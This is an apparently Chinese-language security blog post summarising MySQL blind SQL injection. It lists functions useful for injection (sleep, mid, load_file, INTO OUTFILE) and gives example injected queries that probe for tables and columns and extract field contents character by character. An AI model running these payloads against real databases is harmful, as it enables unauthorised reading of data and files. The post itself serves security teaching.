QQ love member No. 3 seed player

know it then do it && APT086&QQ愛安全实验室成员

MySQL盲注小结

01 Aug 2019 » 习信息安全系列

[TOC]

注入常用的函数

MID(要截取的字符串,起始位置,结束为止) // 截取字符串

CHAR(ASCII) // 返回ASCII码对应的字符

ASCII(字符) // 返回字符对应的ASCII码值

ord(字符) // 返回字符对应的ASCII码值

IF(逻辑表达式,True返回值,Flase返回值) // 逻辑判断

SubStr(要截取的字符串,起始位置,结束为止) // 截取字符串

length(字符串) // 返回字符串的长度

count(列名) // 返回当前列名下有效记录数(NULL不计入)

sleep(s) // 延时s秒

#、/**/、– // 注释符

concat(字符串1,字符串2) // 拼接字符串

load_file(文件路径及名称) // 直接加载文件到源码中

INTO OUTFILE ‘文件路径及名称’ // 输出

判断是否存在users表名

select * from users where id=1 and 0<(select count(*) from users);   

// 返回真则存在users表名

判断是否存在name字段

select * from users where id=1 and 0<(select count(name) from users);   

// 返回真则存在name字段

取出 name 字段内容

select * from users where id=1 and 'g' = mid((select name from users limit 1),8,1);

// ‘g’ 是遍历的,后面的为真则递增加1,一直到8说明name字段的长度为8位;

// 在递增加1的话则永远为假,到这个时候脚本就可以停止了。


「 转载请声明博客地址及APT086&QQ愛安全实验室 」